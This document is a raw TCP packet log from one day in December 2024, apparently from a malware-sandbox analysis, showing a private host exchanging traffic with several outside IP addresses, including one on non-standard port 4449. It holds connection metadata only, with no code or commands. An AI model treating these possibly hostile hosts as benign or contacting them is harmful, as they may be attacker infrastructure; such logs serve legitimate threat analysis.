Dec 10, 2024 11:11:29.485647917 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.485660076 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486459970 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486471891 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486488104 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486499071 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486510038 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486521959 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486532927 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486543894 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486556053 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486567020 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486578941 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.486589909 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.487185955 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.487205029 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.487219095 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.487227917 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:29.494874954 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.494921923 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.495100975 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:29.495101929 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:32.338267088 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:32.457664967 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:32.463072062 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:32.582367897 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:32.777497053 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:32.854789972 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:32.952730894 CET	49868	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:32.953049898 CET	49906	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:32.969430923 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:33.051615000 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:33.072304964 CET	80	49906	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:33.072421074 CET	80	49868	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:33.072443008 CET	49906	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:33.072653055 CET	49906	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:33.072699070 CET	49868	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:33.192018986 CET	80	49906	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:33.601999044 CET	49912	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:33.602039099 CET	443	49912	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:33.605036020 CET	49912	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:33.606342077 CET	49912	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:33.606357098 CET	443	49912	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:33.939450026 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:34.058885098 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:34.058942080 CET	49856	4449	192.168.2.5	205.209.109.10
Dec 10, 2024 11:11:34.178456068 CET	4449	49856	205.209.109.10	192.168.2.5
Dec 10, 2024 11:11:34.430464029 CET	80	49906	185.215.113.43	192.168.2.5
Dec 10, 2024 11:11:34.430634022 CET	49906	80	192.168.2.5	185.215.113.43
Dec 10, 2024 11:11:34.434019089 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:34.434334040 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:34.553920031 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:34.553963900 CET	80	49880	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:34.555785894 CET	49880	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:34.555794001 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:34.556278944 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:34.675551891 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:34.831578970 CET	443	49912	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:34.831662893 CET	49912	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:34.832906961 CET	49912	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:34.832917929 CET	443	49912	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:34.833169937 CET	443	49912	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:34.834289074 CET	49912	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:34.834408045 CET	49912	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:34.834438086 CET	443	49912	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:35.887729883 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:35.887809038 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:35.887820005 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:35.887830019 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:35.887870073 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:35.887881041 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:35.887892008 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:35.887902021 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:35.887993097 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:35.888072968 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:35.888108969 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:35.888119936 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:35.889638901 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.007414103 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.007477999 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.007498980 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.007574081 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.080425024 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.080481052 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.084148884 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.084232092 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.091172934 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.092566967 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.092653990 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.092731953 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.094768047 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.101115942 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.101191044 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.102224112 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.109752893 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.109828949 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.115735054 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.118099928 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.118192911 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.126549959 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.126604080 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.135090113 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.135153055 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.135409117 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.143764019 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.143831968 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.151731014 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.152005911 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.152137041 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.155107021 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.159643888 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.159732103 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.163499117 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.271939993 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.271995068 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.275732040 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.275779009 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.276552916 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.281595945 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.281836033 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.289186001 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.289290905 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.296845913 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.296937943 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.296957016 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.298299074 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.301980972 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.302089930 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.306917906 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.307039976 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.311918020 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.312072992 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.313232899 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.316585064 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.316821098 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.316900015 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.316951990 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.321842909 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.321950912 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.322153091 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.323523045 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.326778889 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.326829910 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.331974030 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.332067966 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.337143898 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.337167978 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.337328911 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.342894077 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.343061924 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.345674992 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.346932888 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.347040892 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.347060919 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.347088099 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.351773024 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.351809025 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.351826906 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.351855993 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.464276075 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.464343071 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.466398954 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.466571093 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.470458984 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.471434116 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.471538067 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.476381063 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.476484060 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.478435040 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.480849981 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.480911970 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.481679916 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.485325098 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.485423088 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.489464045 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.489605904 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.491831064 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.493657112 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.493710995 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.498168945 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.498235941 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.498620033 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.502177954 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.502254963 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.507092953 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.507200956 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.511439085 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.511452913 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.515265942 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.515348911 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.515894890 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.515930891 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.519351006 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.519365072 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.519414902 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.522998095 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.523061991 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.523166895 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.523216009 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.527225018 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.527293921 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.527318001 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.527331114 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.531403065 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.531455040 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.531491041 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.531559944 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.535612106 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.535737991 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.539012909 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.539798975 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.539870977 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.542185068 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.543992996 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.544145107 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.548250914 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.548480034 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.551285982 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.552364111 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.552453041 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.556593895 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.556732893 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.559343100 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.559751034 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.560800076 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.560848951 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.560899973 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.560941935 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.565160036 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.565206051 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.565282106 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.565320015 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.569212914 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.569255114 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.569382906 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.569423914 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.621215105 CET	443	49912	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:36.621334076 CET	443	49912	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:36.629399061 CET	49912	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:36.630492926 CET	49912	443	192.168.2.5	104.21.32.1
Dec 10, 2024 11:11:36.630511045 CET	443	49912	104.21.32.1	192.168.2.5
Dec 10, 2024 11:11:36.664819002 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.664886951 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.665170908 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.666333914 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.666462898 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.669825077 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.669873953 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.673253059 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.673341990 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.673477888 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.673551083 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.676783085 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.676821947 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.676858902 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.676898003 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.680200100 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.680322886 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.683592081 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.683638096 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.685520887 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.686897993 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.686964035 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.687035084 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.687134981 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.690012932 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.690053940 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.690191031 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.690233946 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.693312883 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.693355083 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.693387032 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.693432093 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.696016073 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.696419954 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.699727058 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.699790955 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.700258017 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.702691078 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.702835083 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.703042030 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.705154896 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.705272913 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.707654953 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.707798004 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.710572958 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.710690975 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.713586092 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.713736057 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.715529919 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.716487885 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.716577053 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.717221975 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.719413996 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.719557047 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.720664024 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.722347021 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.722523928 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.725298882 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.725363970 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.728179932 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.728275061 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.729355097 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.729386091 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.731105089 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.731220007 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.734011889 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.734194040 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.734221935 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.734296083 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.736916065 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.737044096 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.739850044 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.739921093 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.740672112 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.742820024 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.742985964 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.745922089 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.746098995 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.748661995 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.748790979 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.749624968 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.751585960 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.751707077 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.752424002 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.754544020 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.754587889 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.754674911 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.754710913 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.757699966 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.757810116 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.757873058 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:36.761116028 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.761250973 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.763596058 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.763653040 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.766241074 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.766350985 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.769185066 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:36.769361019 CET	80	49914	185.215.113.16	192.168.2.5
